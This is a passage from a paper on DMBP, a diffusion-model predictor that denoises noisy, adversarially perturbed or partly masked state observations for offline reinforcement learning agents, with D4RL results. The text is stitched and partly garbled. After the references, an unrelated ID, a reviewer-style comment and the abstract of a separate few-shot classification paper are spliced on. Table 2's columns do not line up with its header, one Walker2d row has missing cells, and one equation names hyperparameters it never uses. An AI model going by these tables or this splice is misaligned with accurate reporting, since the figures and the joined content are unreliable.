updates the critic through minimizing the constrained Q-value loss (Kumar et al., 2020; An et al., 2021; Lyu et al., 2022; Yang et al., 2022): \[ L(\psi) := L_q(\psi) + \alpha_{critic} L_{TD}(\psi), \] where \( L_q(\psi) \) is the penalty on Q-value for out-of-distribution actions, and \( \alpha_{critic} \) is the coefficient for the TD loss term. **Diffusion model.** Diffusion based generative models have been widely used for synthesizing high-quality images from text descriptions. The forward process, i.e., the noising process, is a Markov chain that gradually adds Gaussian noise to data according to a variance schedule \( \beta_1, \ldots, \beta_K \): \[ q(x_{1:K} | x_0) := \prod_{k=1}^{K} q(x_k | x_{k-1}), \quad q(x_k | x_{k-1}) := N(x_k; \sqrt{1 - \beta_k} x_{k-1}, \beta_k I). \] The reverse process, i.e., the denoising process, is a Markov chain with learned Gaussian transitions that usually starts at \( p(x_K) = N(x_K; 0, I) \): \[ p_\theta(x_{0:K}) := p(x_K) \prod_{k=1}^{K} p_\theta(x_{k-1} | x_k), \quad p_\theta(x_{k-1} | x_k) := N(x_{k-1}; \mu_\theta(x_k, k), \Sigma_\theta(x_k, k)). \] Ho et al. (2020) derive a simplified surrogate loss for the reverse process denoising: \[ L_{denoise}(\theta) := \mathbb{E}_{k \sim [1,K], \epsilon \sim N(0,I)}[\|\epsilon_\theta(x_k, k) - \epsilon\|^2]. \] The Gaussian noise \( \epsilon \), which perturbs the original data \( x_0 \) to noised data \( x_k \), is estimated through the neural network based predictor \( \epsilon_\theta(x_k, k) \). \( x_{k-1} \) is sampled from the reverse process as \( \mu_\theta(x_k, k) \) and \( \Sigma_\theta(x_k, k) \) are functions of \( \epsilon_\theta(x_k, k) \). It is straightforward to extend diffusion models to conditional ones with \( p_\theta(x_{t-1} | x_t, c) \) (conditioned on information \( c \)), where the noise prediction is given by \( \epsilon_\theta(x_k, k, c) \). ### 4 Diffusion Model Based Predictor We express the perturbed version of the original state \( s \) as \( \tilde{s} \), where \( B_d(s, \epsilon) := \{\tilde{s} : d(s, \tilde{s}) \leq \epsilon\} \) is the perturbation set and the metric \( d(\cdot, \cdot) \) is based on \( \ell_p \) norm, as in Shen et al. (2020). An adversarial attack on state \( s \) is introduced in Yang et al. (2022): \[ \tilde{s}^* = \arg\max_{\tilde{s} \in B_d(s, \epsilon)} D(\pi_\phi(\cdot | s) || \pi_\phi(\cdot | \tilde{s})), \] where \( D(\cdot || \cdot) \) is the divergence of two distributions. The targets of both works are to minimize the smoothness regularizer for the policy: \( R_s^P = \mathbb{E}_{s \sim D} \max_{\tilde{s} \in B_d(s, \epsilon)} D(\pi_\phi(\cdot | s) || \pi_\phi(\cdot | \tilde{s})) \), and to minimize the smoothness regularizer for the value function: \( R_s^V = \mathbb{E}_{s \sim D, a \sim \pi} \max_{\tilde{s} \in B_d(s, \epsilon)} (Q(\tilde{s}, a) - Q(s, a)) \), against the perturbations on state observations. We remark that we do not normalize the state observations when applying the perturbations as in Shen et al. (2020); Sun et al. (2021), in contrast to Zhang et al. (2020); Yang et al. (2022). In Section 4.1, we propose DMBP to recover the actual state for decision-making (which is fundamentally different from the technical approaches in aforementioned works). In Section 4.2, we propose a new non-Markovian loss function to mitigate error accumulation. In Section 4.3, we apply DMBP to RL tasks under incomplete state observations with unobserved dimension(s). #### 4.1 Conditional diffusion for predicting real state As there are two timesteps involved in our framework, we use superscripts \( i, k \in \{1, \ldots, K\} \) to denote diffusion timestep and subscript \( t \in \{1, \ldots, T\} \) to denote trajectory timestep in RL tasks. DMBP is inspired by the diffusion model framework originally proposed for image generations (Ho et al., 2020). As the proposed framework essentially deals with information with small to medium scale noises instead of generating data from pure noise, we redesign the variance schedule as: \[ \beta_i = 1 - \alpha_i = e^{-\frac{i}{T} + c}, \quad \bar{\alpha}_k = \prod_{i=1}^{k} \alpha_i, \quad \tilde{\beta}_i = \frac{1 - \bar{\alpha}_{i-1}}{1 - \bar{\alpha}_i} \beta_i, \] where \(a, b, c\) are hyperparameters (cf. Appendix B.2). The redesigned variance schedule restricts the noise scale to be small in the diffusion process and limits the total number of diffusion timesteps \(K\) for predictor training. We use the conditional diffusion model to obtain the denoised state \(\hat{s}_t\) from the noised state \(\tilde{s}_t\), with the condition on last step action \(a_{t-1}\) and the previously denoised state trajectory \(\tau_{t-1} := \{\hat{s}_1, \hat{s}_2, ..., \hat{s}_{t-1}\}\). The denoised state \(\hat{s}_t\) is sampled from the reverse denoising process, which can be expressed as a Markov chain: \[ \hat{s}_t \sim p_\theta(\hat{s}_t^{0:k} | a_{t-1}, \tau_{t-1}) = f_k(\hat{s}_t) \prod_{i=1}^{k} p_\theta(\hat{s}_t^{i-1} | \hat{s}_t^i, a_{t-1}, \tau_{t-1}), \] (2) where \(f_k(\hat{s}_t) = \sqrt{\bar{\alpha}_t} \hat{s}_t\). The transitions \(p_\theta(\hat{s}_t^{i-1} | \hat{s}_t^i, a_{t-1}, \tau_{t-1})\) can be modeled using Gaussian distribution \(N(\hat{s}_t^{i-1}; \mu_\theta(\hat{s}_t^i, a_{t-1}, \tau_{t-1}), \Sigma_\theta(\hat{s}_t^i, a_{t-1}, \tau_{t-1}))\), with the following mean and variance (Ho et al., 2020): \[ \mu_\theta(\hat{s}_t^i, a_{t-1}, \tau_{t-1}, i) = \frac{\sqrt{\bar{\alpha}_i(1 - \bar{\alpha}_{i-1})}}{1 - \bar{\alpha}_i} \hat{s}_t^{0(i)} + \frac{\sqrt{\bar{\alpha}_{i-1}} \beta_i}{1 - \bar{\alpha}_i} \hat{s}_t^{0(i)}, \quad \Sigma_\theta(\hat{s}_t^i, a_{t-1}, \tau_{t-1}, i) = \tilde{\beta}_i I. \] Here, \(\hat{s}_t^{0(i)}\) is the state directly recovered from the current diffusion step noise prediction, which is given by \[ \hat{s}_t^{0(i)} = \frac{1}{\sqrt{\bar{\alpha}_i}} [\hat{s}_t^i - \sqrt{1 - \bar{\alpha}_i} \epsilon_\theta(\hat{s}_t^i, a_{t-1}, \tau_{t-1}, i)]. \] (3) The reverse diffusion chain is given by \[ \hat{s}_t^{i-1} | \hat{s}_t^i = \frac{\bar{\alpha}_i}{\sqrt{\bar{\alpha}_i}} \hat{s}_t^i - \frac{\beta_i}{\sqrt{\bar{\alpha}_i(1 - \bar{\alpha}_i)}} \epsilon_\theta(\hat{s}_t^i, a_{t-1}, \tau_{t-1}, i) + \sqrt{\beta_i} \epsilon, \] (4) where \(\epsilon \sim N(0, I)\) and is set to be 0 at the final denoising step \((i = 1)\). For the final step denoising output of Eq. 4, \(\hat{s}_t^1\) (i.e., the output of DMBP), we refer it to as \(\hat{s}_t\). \(\hat{s}_t\) can be used for decision-making by any offline-trained agent according to \(a_t = \pi_\phi(\cdot | \hat{s}_t)\). \(\hat{s}_t\) is stored in the trajectory cache \(\tau_t\), and the pair of \((\tau_t, a_t)\) will be utilized for the next step denoising. In practice, on account of the stochasticity involved in the diffusion process, we denoise the state 50 times in parallel and take the average value as the final output \(\hat{s}_t\) to prevent the denoised state from falling out of the distribution. We find that directly inputting state trajectories and action into neural networks leads to poor noise estimation (cf. Appendix C for ablation study on network structure), partially due to the fact that \(\hat{s}_{t-1}\) is more closely related to \(\hat{s}_t^j\) than \(\hat{s}_j\) with \(j < t - 1\), and that this information cannot be well captured by neural networks. Therefore, we first extract the information from the trajectory with U-net (Ronneberger et al., 2015; Janner et al., 2022) (recorded as \(U_\xi(\hat{s}_t^i, \tau_{t-1})\)), and then utilize an MLP-based neural network to predict the noise through \(\epsilon_\theta(U_\xi(\hat{s}_t^i, \tau_{t-1}), \hat{s}_t^i, a_{t-1}, \hat{s}_{t-1}, i)\), which is represented by \(\epsilon_\theta(\hat{s}_t^i, a_{t-1}, \tau_{t-1}, i)\) for notational convenience. See Appendix B.1 for details. ### 4.2 Non-Markovian Loss Function The accuracy of the current denoising result \(\hat{s}_t\) is highly dependent on the accuracy of the diffusion condition \(\tau_{t-1}\). A straightforward adoption of the loss function [L] in the denoising diffusion probabilistic model (DDPM) (Ho et al., 2020) may lead to severe error accumulation in online testing, due to the mismatch between the training-process noise prediction \(\epsilon_\theta(\hat{s}_t^i, a_{t-1}, \tau_{t-1}, i)\) and the testing-process noise prediction \(\epsilon_\theta(\hat{s}_t^{i+1}, a_t, \tau_{t-1}, i)\). To mitigate error accumulation and enhance the robustness of DMBP, we propose a non-Markovian training objective to minimize the sum entropy of denoised states over the RL trajectory \(\tau\): \[ L_{\text{entropy}} = \sum_{t=2}^{T} \mathbb{E}_{s_t \in \tau, q(s_t)} \left[ -\log P(\hat{s}_t | a_{t-1}, \tau_{t-1}) \right], \] (5) where \(P(\hat{s}_t | a_{t-1}, \tau_{t-1}) = p_\theta(\hat{s}_t^{0} | a_{t-1}, \tau_{t-1})\) is the distribution of state after denoising at RL timestep \(t\). Following the setting in (Ho et al., 2020), we establish a closed-form expression of the training objective that minimizes Eq. 5, which can be simplified as (cf. the details in Appendix A): \[ L_{\text{simple}}(\theta) = \mathbb{E}_{s_1 \sim d_0, \epsilon_i \sim N(0, I), i \sim U_K} \left[ \sum_{t=2}^{T} \| \epsilon_\theta(\hat{s}_t^i, a_{t-1}, \tau_{t-1}, i) - \epsilon_i^i \|_2^2 \right], \] (6) where \( U_K \) is the uniform distribution over discrete set \( \{1, 2, \ldots, K\} \), and the noised states for all terms are sampled through: \[ \tilde{s}_t = \sqrt{\alpha_t} s_t + \sqrt{1 - \alpha_t} \epsilon_t, \quad \epsilon_t \sim \mathcal{N}(0, I). \] For computational convenience, we further simplify Eq. (6) and derive our non-Markovian loss function by sampling the partial trajectory \((s_{t-N}, a_{t-N}, s_{t-N+1}, \ldots, s_{t+M-1})\) from the offline dataset \( D_\nu \) (\( N \) is the condition trajectory length and \( M \) is the sample trajectory length): \[ L(\theta) = \mathbb{E}_{i \sim U_K, \epsilon_t \sim \mathcal{N}(0, I), (s_{t-N}, \ldots, s_{t+M-1}) \in D_\nu} \left[ \| \epsilon_\theta(\tilde{s}_t^i, a_{t-1}, \tau_{t-1}^i, i) - \epsilon_t^i \|^2 + \sum_{m=t+1}^{t+M-1} \| \epsilon_\theta(\tilde{s}_m^i, a_{m-1}, \tau_{m-1}^i, i) - \epsilon_m^i \|^2 \right], \] where the state trajectory condition for the predictor \( \epsilon_\theta \) in \( L_i \) is the original \( \tau_{t-1}^i = \{s_{t-N}, \ldots, s_{t-1}\} \) from the offline dataset \( D_\nu \), and the state trajectory condition in \( L_m \) can be expressed as \( \tau_{m-1}^i = \{\tilde{s}_j | j \in \{m-N, \ldots, m-1\}\} \), with: \[ \tilde{s}_j = \begin{cases} s_j & \text{if } j < t, \\ \frac{1}{\sqrt{\alpha_t}} [\tilde{s}_j^i - \sqrt{1 - \alpha_t} \epsilon_\theta(\tilde{s}_j^i, a_{j-1}, \tau_{j-1}^i, i)] & \text{otherwise } (j \in \{t, \ldots, t+M-2\}). \end{cases} \] Different from the loss function in Ho et al. (2020) that concerns only single-step diffusion accuracy (for data generation under conditions on ground-truth states), the proposed non-Markovian loss function trades off between the diffusion accuracy at the current RL timestep and the condition shift in a long RL time horizon (to avoid error accumulation). ### 4.3 Diffusion based state infilling for unobserved dimension Inspired by the application of diffusion models in image inpainting (Lugmayr et al., 2022), we propose a state infilling procedure for DMBP facilitated decision making, which is shown to work well on state-based RL tasks with incomplete state observations (cf. Section 5.2). We denote the ground truth state as \( s_t \), the unobserved state information as \((1-m) \odot s_t \), and the observed state information as \( \hat{s}_t = m \odot s_t \), which is incomplete with some masked dimensions. Given the recovered state trajectory \( \tau_{\hat{s}}_{t-1} \), agent generated action \( a_{t-1} \), and the known information of the current state \( \hat{s}_t \), DMBP aims to recover the original state \( s_t \) for decision making. Following the inpainting method of Lugmayr et al. (2022), DMBP infills the missing state information through Algorithm 1. For each diffusion timestep, the known region of the state is determined from the forward process (noising process) in line 4, and the unknown region of the state is determined from the reverse process (denoising process) in line 7. To avoid the disharmony of the forward and reverse process generated information, the combined information (in line 8) takes one diffusion forward step in line 10, which is called “resampling”. The resampling is performed by \( U \) times for one diffusion timestep. More resampling times may lead to more accurate and harmonious diffusion information at the cost of higher computational load. ### Algorithm 1 Diffusion based state infilling for DMBP **Require:** \( s_t^0 \sim \mathcal{N}(0, I) \), \( \hat{s}_t, a_{t-1}, \tau_{t-1}^i, m \) 1: for \( i = K, \ldots, 1 \) do 2: for \( u = 1, \ldots, U \) do 3: \( \epsilon \sim \mathcal{N}(0, I) \) if \( i > 1 \), else \( \epsilon = 0 \) 4: \( \hat{s}_{t, \text{known}}^{i-1} = \sqrt{\alpha_t} \hat{s}_t + \sqrt{1 - \alpha_t} \epsilon \) 5: \( z \sim \mathcal{N}(0, I) \) if \( i > 1 \), else \( z = 0 \) 6: \( \epsilon_{\text{pred}} = \epsilon_\theta(\hat{s}_t, a_{t-1}, \tau_{t-1}^i, i) \) 7: \( \hat{s}_{t, \text{unknown}}^{i-1} = \frac{1}{\sqrt{\alpha_t}} \hat{s}_t^{i-1} - \frac{\beta_{i-1}}{\sqrt{\alpha_t(1-\alpha_t)}} \epsilon_{\text{pred}} + \sqrt{\beta_{i-1}} z \) 8: \( \hat{s}_t^{i-1} = m \odot \hat{s}_{t, \text{known}}^{i-1} + (1-m) \odot \hat{s}_{t, \text{unknown}}^{i-1} \) 9: if \( u < U \) and \( i > 1 \) then 10: \( \hat{s}_t^i \sim \mathcal{N}(\sqrt{1-\beta_{i-1}} \hat{s}_t^{i-1}, \beta_{i-1} I) \) 11: end if 12: end for 13: end for 14: return \( \hat{s}_t = \hat{s}_t^0 \) ### 5 Experiments We evaluate the proposed DMBP together with several state-of-the-art baseline offline RL algorithms on D4RL Gym benchmark (Fu et al., 2020) against different types of attacks on state observations. The baseline algorithms include Batch Constrained deep Q-learning (BCQ) (Fujimoto et al., 2019), Conservative Q-Learning (CQL) (Kumar et al., 2020), TD3 with Behavior Cloning (TD3+BC) (Fujimoto & Gu, 2021), Diffusion Q-Learning (Diffusion QL) (Wang et al., 2022), and Robust Offline Reinforcement Learning (RORL) (Yang et al., 2022). We train DMBP for 300 epochs (1000 gradient steps with a batch size of 256 for each epoch) with hyperparameters defined in Appendix B.2. We train the baseline algorithms with the corresponding suggested hyperparameters in specific environments and datasets. We perform two tests, on robustness against noised state observations (in Section 5.1) and on robustness against incomplete state observations with unobserved dimension(s) (in Section 5.2). We utilize the same DMBP for all baseline algorithms (cf. the framework in Figure 1), and benchmark their performance against the original baseline algorithms (without DMBP). We present partial results on the D4RL Mujoco benchmark, and the results of other datasets (including medium-expert, medium, and full-replay) and other benchmarks (including Adroit and Franka Kitchen) can be found in Appendix D. ### 5.1 ROBUSTNESS AGAINST NOISED STATE OBSERVATIONS Firstly, we evaluate the performance of DMBP in a basic setting with Gaussian noises of standard deviation $\kappa$: $\tilde{s}_t = s_t + \kappa \cdot N(0, I)$. The evaluation results in Table 1 indicate that DMBP can significantly enhance the robustness of all baseline algorithms, especially on the dataset "medium-replay", where DMBP strengthened baseline algorithms achieve similar scores as in the corresponding noise-free cases. To demonstrate the powerful denoising effect of DMBP, we visualize a partial trajectory of "hopper" during the test in Figure 2. #### Table 1: D4RL score of the baseline algorithms ("base" recorded in black) and the DMBP strengthened ones ("DMPB" recorded in blue) trained with expert (e) and medium-replay (m-r) datasets under different scales of Gaussian random noises on state observation. The evaluation results are averaged over 5 random checkpoints (20 tests for each checkpoint). | Env Dataset | Noise scale | BCQ base | DMBP | CQL base | DMBP | TD3+BC base | DMBP | Diffusion QL base | DMBP | RORL base | DMBP | |-------------|-------------|----------|------|----------|------|-------------|------|------------------|------|-----------|------| | HalfCheetah e | 0.05 | 4.5±2.6 | 6.0±2.3 | 9.1±8.6 | 18.1±8.6 | 60.9±22.5 | 7.3±6.6 | 77.1±15.3 | 4.8±3.6 | 75.2±20.7 | 15.4±3.9 | | m-r | 0.10 | 4.5±2.2 | 26.8±16.2 | 7.4±4.0 | 40.5±16.6 | 4.7±3.6 | 47.5±22.2 | 3.3±2.5 | 39.8±21.8 | 3.7±1.9 | 32.8±20.4 | | Hopper e | 0.05 | 41.6±17.4 | 38.5±11.2 | 35.6±1.3 | 45.8±1.0 | 28.1±8.4 | 44.3±1.0 | 30.1±4.4 | 45.6±0.9 | 45.3±2.2 | 61.9±1.2 | | m-r | 0.10 | 20.6±16.9 | 28.5±11.2 | 25.8±1.3 | 44.6±1.1 | 24.1±8.9 | 42.5±2.6 | 24.2±1.6 | 44.6±3.0 | 30.1±4.9 | 58.4±1.2 | | Walker2d e | 0.05 | 111.6±0.6 | 108.8±1.9 | - | 110.7±0.5 | - | 109.6±0.5 | - | 104.8±12.5 | - | | m-r | 0.10 | 77.9±37.6 | 110.3±2.0 | 97.6±21.9 | 94.3±20.3 | 72.9±39.4 | 109.2±1.5 | 93.3±27.2 | 109.1±4.0 | 95.4±19.7 | 97.8±20.2 | | 0.15 | 28.2±32.4 | 104.2±13.5 | 78.9±33.2 | 83.4±23.3 | 9.2±13.6 | 107.5±5.2 | 30.5±32.5 | 94.5±18.1 | 81.6±26.4 | 84.5±26.4 | Figure 2: Visualization of the denoising effect of DMBP with Diffusion QL (trained on the dataset of hopper-medium-replay-v2). The observation is perturbed with Gaussian distributed random noise with std of 0.10. Table 2: D4RL score of the baseline algorithms and the DMBP strengthened ones under uniformly distributed random noise (U-rand), maximum action-difference attack (MAD), and minimum Q-value attack (MinQ) on state observations. | Env | Dataset/Noise Scale | Type | BCQ base | DMBP-CQL base | CQL base | TD3+BC base | DMBP base | Diffusion-QL base | RORL base | DMBP base | |--------------|---------------------|------|----------|---------------|----------|-------------|-----------|------------------|----------|-----------| | HalfCheetah | e | U-rand | 7.4±4.9 | 69.1±27.5 | 27.2±6.4 | 69.6±22.4 | 16.3±13.1 | 84.2±17.1 | 11.6±10.9 | 77.8±21.8 | 24.3±7.5 | 66.8±27.0 | | | | MAD | 3.6±1.7 | 52.5±17.9 | 12.4±6.9 | 61.2±19.7 | 4.7±3.3 | 65.4±16.0 | 4.3±3.2 | 62.9±13.2 | 14.1±2.5 | 54.3±27.1 | | | | MinQ | 12.8±9.3 | 51.8±33.9 | 19.4±11.3 | 60.4±19.4 | 18.0±4.2 | 88.2±11.3 | 8.0±6.7 | 71.1±15.2 | 9.3±8.0 | 71.0±29.1 | | | 0.05 | U-rand | 34.1±10.8 | 70.6±25.3 | 27.1±6.8 | 39.0±6.6 | 46.7±1.8 | 38.8±25.7 | 34.2±10.3 | 62.2±11.1 | 34.2±11.1 | 62.2±11.1 | | | | MAD | 19.2±8.2 | 29.4±6.9 | 39.0±2.6 | 46.5±1.8 | 27.1±3.4 | 36.2±0.9 | 33.4±2.8 | 34.5±5.5 | 22.5±1.5 | 23.2±1.0 | | | | MinQ | 5.1±5.2 | 36.7±8.8 | 39.2±0.8 | 46.2±1.1 | 36.7±6.8 | 44.8±1.1 | 37.0±4.8 | 38.6±1.1 | 34.0±1.4 | 63.7±2.3 | | | 0.10 | U-rand | 46.1±20.7 | 66.9±26.3 | 59.6±29.4 | 49.5±23.8 | 27.6±28.3 | 84.0±27.4 | 53.2±20.8 | 84.4±25.3 | 85.3±37.0 | 81.9±25.3 | | | | MAD | 31.1±14.4 | 53.2±24.2 | 22.6±13.9 | 73.9±27.9 | 27.2±10.9 | 60.3±27.2 | 36.8±9.0 | 37.1±12.3 | 36.6±22.2 | 59.0±13.8 | | | | MinQ | 47.4±18.9 | 62.5±27.9 | 32.7±13.5 | 58.7±17.9 | 45.3±27.5 | 95.7±27.6 | 66.7±33.6 | 59.2±23.9 | 79.8±32.7 | 59.4±22.5 | | Hopper | e | U-rand | 18.5±8.2 | 68.9±19.2 | 66.3±20.1 | 95.9±8.8 | 20.6±9.1 | 65.4±22.0 | 33.9±10.7 | 94.9±17.7 | 80.7±28.0 | 103.5±1.3 | | | | MAD | 5.1±5.0 | 37.5±26.1 | 32.1±15.9 | 88.9±13.7 | 6.1±5.5 | 64.3±21.8 | 9.9±8.1 | 38.3±15.8 | 51.6±30.7 | 97.5±2.5 | | | | MinQ | 5.3±5.4 | 18.3±18.4 | 84.6±14.1 | 87.5±6.6 | 11.8±7.6 | 80.5±18.1 | 51.2±25.1 | 62.5±27.3 | 98.3±6.2 | 103.2±2.4 | | | 0.05 | U-rand | 102.1±11.8 | 110.4±10.8 | 106.1±9.9 | 106.0±7.4 | 106.1±2.9 | 110.3±10.5 | 107.2±1.0 | 109.4±10.5 | 95.1±15.7 | 97.7±9.5 | | | | MAD | 50.5±4.37 | 70.5±13.3 | 64.1±27.0 | 97.6±16.1 | 19.9±22.7 | 69.7±17.5 | 36.6±35.5 | 88.2±24.8 | 61.9±29.2 | 83.8±19.9 | | | | MinQ | 99.9±22.2 | 105.6±11 | 99.9±11.8 | 102.4±6.9 | 91.9±22.4 | 105.5±1.3 | 101.1±2.0 | 102.4±1.3 | 91.8±28.0 | 89.3±13.5 | | | 0.10 | U-rand | 17.3±12.7 | 54.9±39.5 | 69.2±20.9 | 78.1±9.2 | 57.2±24.3 | 83.6±14.8 | 64.2±27.8 | 91.7±12.1 | 89.9±11.7 | 88.7±2.1 | | | | MAD | 8.6±3.5 | 43.4±29.8 | 19.7±14.7 | 78.4±8.8 | 8.8±4.4 | 70.8±19.1 | 7.2±2.3 | 66.1±24.2 | 81.9±11.5 | 90.3±3.5 | | | | MinQ | 7.3±4.2 | 30.3±26.1 | 66.5±11.8 | 78.5±4.2 | 21.7±15.9 | 76.4±14.9 | 47.2±23.2 | 68.0±19.5 | 82.3±1.4 | 89.6±1.7 | We consider three additional types of noise attacks that are commonly used on state observations, where DMBP-strengthened algorithms also outperform the corresponding baselines (cf. Table 2): i) Uniform random noise distributed inside the $\ell_\infty$ ball with the norm of $\kappa$: $\hat{s}_t = s_t + \kappa \cdot \mathcal{U}(-I, I)$. ii) Maximum action-difference (adversarial) attack: The noises are selected inside the $\ell_\infty$ ball with the norm of $\kappa$, such that $\hat{s}_t = s_t + \arg\max_{\hat{s} \in B_\delta(s, \kappa)} D(\pi_\phi(\cdot|\hat{s}) || \pi_\phi(\cdot|s))$. Among 20 samples of $\hat{s}_t$ in the ball, we choose the one with the largest $\|\pi_\phi(\cdot|\hat{s}) - \pi_\phi(\cdot|s)\|^2$. iii) Minimum Q-value (adversarial) attack: The noises are selected inside the $\ell_\infty$ ball with the norm of $\kappa$ such that, $\hat{s}_t = s_t + \arg\min_{\hat{s} \in B_\delta(s, \kappa)} Q(\hat{s}_t, \pi_\phi(\cdot|\hat{s}))$. Again, we sample 20 times and choose the one with the minimum Q to be the perturbed state $\hat{s}_t$. The latter two adversarial attacks have been considered in the literature (Pinto et al., 2017; Zhang et al., 2020; Yang et al., 2022). For fair comparison, when we use DMBP against adversarial attacks, we first sample 20 noised states $\hat{s}_t$ and denoise them using DMBP, and then choose the denoised states $\hat{s}_t$ with the maximum action difference or the minimum Q-value as the perturbed state. Figure 3: The performance of CQL, DMBP-CQL, RORL, and DMBP-RORL with incomplete state observations that have 1-5 unobserved dimensions. The dash-dot lines represent the performance of the corresponding baseline algorithms in the original environment with fully observable states. (The total state observation dimension is 11 for hopper, and 17 for both halfcheetah and walker2d.) 5.2 Robustness Against Incomplete State Observations with Unobserved Dimension We utilize DMBP to recover the missing state information for decision-making. In D4RL benchmark problems, we mask some dimensional state information that cannot be observed by the tested policy (i.e., the masked dimensions of the state are set as 0 for \( t \in \{2, 3, \ldots, T\} \)). The baseline algorithms make decisions based on the observed (incomplete) states, and DMBP-improved counterparts take actions according to the recovered states. For each dimension of the state, we make the dimension unobserved and conduct 10 tests. When multiple state dimensions cannot be observed, we randomly select 30 groups of dimensions and conduct 10 tests on each group. The experiment results of CQL, RORL with offline “expert” and “medium-replay” datasets are shown in Figure 3. DMBP significantly enhances the performance of all baseline algorithms by accurately predicting the missing state information. On “medium-replay” datasets, the DMBP strengthened algorithms incur little performance degradation in masked environments, compared with that achieved in the original environments with complete and accurate observations. 5.3 Ablation Study Figure 4: The checkpoint and training process evaluations of DMBP-Diffusion QL under Gaussian random noises, where DMBP is trained on hopper-expert-v2 with different sample trajectory lengths (\( M \)). The curves are averaged over 5 random seeds, and the checkpoints are selected randomly after gradient steps of \( 2 \times 10^6 \). In Figure 4, we conduct ablation studies on dataset "hopper-expert-v2", where algorithms are more prone to error accumulation than in other datasets/environments, to demonstrate the efficacy of the proposed non-Markovian loss function and evaluate the impact of the non-Markovian sampling length (\( M \) in Eq.7). We utilize pre-trained Diffusion QL for decision-making to evaluate the performance of DMBP under the framework in Figure 1. Other hyperparameters and DMBP training follow the basic settings in Appendix [B.2] and [D.1] respectively. When \( M = 1 \), the DMBP training objective reduces to the classical training objective of diffusion models in Eq.1 (i.e., \( L_M = 0 \) in Eq.7). From the second to the fourth subplots of Figure 4, we observe that the direct adoption of classical conditional diffusion models suffers from severe error accumulation as training proceeds. The proposed non-Markovian training objective significantly enhances the robustness of the baseline RL algorithm against state observation perturbations, especially when the noise scale is large. When \( M \) is no less than 6, the performance of DMBP remains almost the same. To expedite the computation, we set \( M = 6 \) for the "hopper" environment. More ablations studies on neural network structure and condition trajectory lengths (\( N \)) can be found in Appendix C. 6 Conclusion In this work, we propose the first framework of state-denoising for offline RL against observation perturbations in state-based tasks. Leveraging conditional diffusion models, we develop Diffusion Model-Based Predictor (DMBP) to recover the actual state for decision-making. To reduce the error accumulation during test, we propose a new non-Markovian loss function that minimizes the sum entropy of denoised states along the trajectory. Experiments on D4RL benchmarks demonstrate that the proposed DMBP can significantly enhance the robustness of existing offline RL algorithms against different scales of random noises and even adversarial attacks. The proposed framework is shown to be able to effectively deal with the cases of incomplete state observations (with multiple unobserved dimensions) for state-based RL tasks. ACKNOWLEDGMENTS This work was supported in part by the General Research Fund (GRF) project 14200720 of the Hong Kong University Grants Committee and the National Natural Science Foundation of China (NSFC) Project 62073273. The authors would like to thank the anonymous reviewers for valuable discussion. REFERENCES Anurag Ajay, Yilun Du, Abhi Gupta, Joshua Tenenbaum, Tommi Jaakkola, and Pulkit Agrawal. Is conditional generative modeling all you need for decision-making? arXiv preprint arXiv:2211.15657, 2022. Gaon An, Seungyong Moon, Jang-Hyun Kim, and Hyun Oh Song. Uncertainty-based offline reinforcement learning with diversified Q-ensemble. Advances in Neural Information Processing Systems, 34:7436–7447, 2021. David M Chan, Roshan Rao, Forrest Huang, and John F Canny. t-sne-cuda: Gpu-accelerated t-sne and its applications to modern data. In 2018 30th International Symposium on Computer Architecture and High Performance Computing (SBAC-PAD), pp. 330–338. IEEE, 2018. Hyungjin Chung, Byeongsu Sim, and Jong Chul Ye. Come-closer-diffuse-faster: Accelerating conditional diffusion models for inverse problems through stochastic contraction. In Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition, pp. 12413–12422, 2022. Giulio Franzese, Simone Rossi, Lixuan Yang, Alessandro Finamore, Dario Rossi, Maurizio Filippone, and Pietro Michiardi. How much is enough? a study on diffusion times in score-based generative models. arXiv preprint arXiv:2206.05173, 2022. Justin Fu, Aviral Kumar, Ofir Nachum, George Tucker, and Sergey Levine. D4RL: Datasets for deep data-driven reinforcement learning. arXiv preprint arXiv:2004.07219, 2020. Scott Fujimoto and Shixiang Shane Gu. A minimalist approach to offline reinforcement learning. Advances in Neural Information Processing Systems, 34:20132–20145, 2021. Scott Fujimoto, David Meger, and Doina Precup. Off-policy deep reinforcement learning without exploration. In International Conference on Machine Learning, pp. 2052–2062. PMLR, 2019. Adam Gleave, Michael Dennis, Cody Wild, Neel Kant, Sergey Levine, and Stuart Russell. Adversarial policies: Attacking deep reinforcement learning. arXiv preprint arXiv:1905.10615, 2019. Chin Pang Ho, Marek Petrik, and Wolfram Wiesemann. Fast Bellman updates for robust MDPs. In International Conference on Machine Learning, pp. 1979–1988. PMLR, 2018. Jonathan Ho, Ajay Jain, and Pieter Abbeel. Denoising diffusion probabilistic models. Advances in Neural Information Processing Systems, 33:6840–6851, 2020. Michael Janner, Justin Fu, Marvin Zhang, and Sergey Levine. When to trust your model: Model-based policy optimization. Advances in Neural Information Processing Systems, 32, 2019. Michael Janner, Yilun Du, Joshua B. Tenenbaum, and Sergey Levine. Planning with diffusion for flexible behavior synthesis. In International Conference on Machine Learning, 2022. Aviral Kumar, Justin Fu, Matthew Soh, George Tucker, and Sergey Levine. Stabilizing off-policy Q-learning via bootstrapping error reduction. Advances in Neural Information Processing Systems, 32, 2019. Aviral Kumar, Aurick Zhou, George Tucker, and Sergey Levine. Conservative Q-learning for offline reinforcement learning. Advances in Neural Information Processing Systems, 33:1179–1191, 2020. Sergey Levine, Aviral Kumar, George Tucker, and Justin Fu. Offline reinforcement learning: Tutorial, review, and perspectives on open problems. arXiv preprint arXiv:2005.01643, 2020.
EYtga9mSdT
- Self-supervised pretraining has proven to be extremely helpful for few-shot learning [2, 3]. As most of the other methods compared in this paper do not use self-supervised pretraining, the comparisons are not fair.
BALANCED LEARNING WITH TOKEN SELECTION FOR FEW-SHOT CLASSIFICATION Anonymous authors Paper under double-blind review ABSTRACT In recent years, patch-based approaches have shown promise in few-shot learning, with further improvements observed through the use of self-supervised learning. However, we observe that the mainstream object-oriented approach focuses mainly on the salient part of the subject and also ignores the non-annotated part of the image. Based on the assumption that any patch of the image is beneficial to learning, we present an end-to-end learning framework, which reconsiders the whole image from a multi-level perspective. The learning of annotated subjects involves Direct Patch Learning (DPL) to promote balanced learning of different features, and Gaussian Mixup (GMIX) to provide extra mixed patch-level labels. As for the non-annotated part, we utilize a cascading token selection strategy along with self-supervised learning to better utilize knowledge in the background in the current context by learning the consistent representation of different views from the same image. Finally, in inductive few-shot learning, our method outperforms many previous methods and achieves new state-of-the-art performance. Furthermore, it provides an insight that non-annotated parts are also favorable for few-shot learning. As an ablation study, the effectiveness of each designed component is verified and the mechanism of how our method outperforms the baseline is shown both quantitatively and visually. 1 